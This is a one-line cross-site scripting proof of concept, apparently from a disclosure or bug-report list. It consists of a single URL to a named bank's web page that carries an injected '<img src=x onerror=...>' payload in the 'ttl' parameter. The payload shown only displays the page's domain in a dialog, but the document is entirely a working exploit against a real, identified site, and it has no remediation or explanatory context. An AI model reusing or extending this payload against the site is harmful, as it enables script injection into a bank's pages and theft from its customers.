Cross Site Scripting:

https://app.santandertotta.pt/ficheros/DemosFrameNBE.html?urlimagem=NBEAdesaoOnline&numimagem=13&ttl=<img src=x onerror=confirm(document.domain)>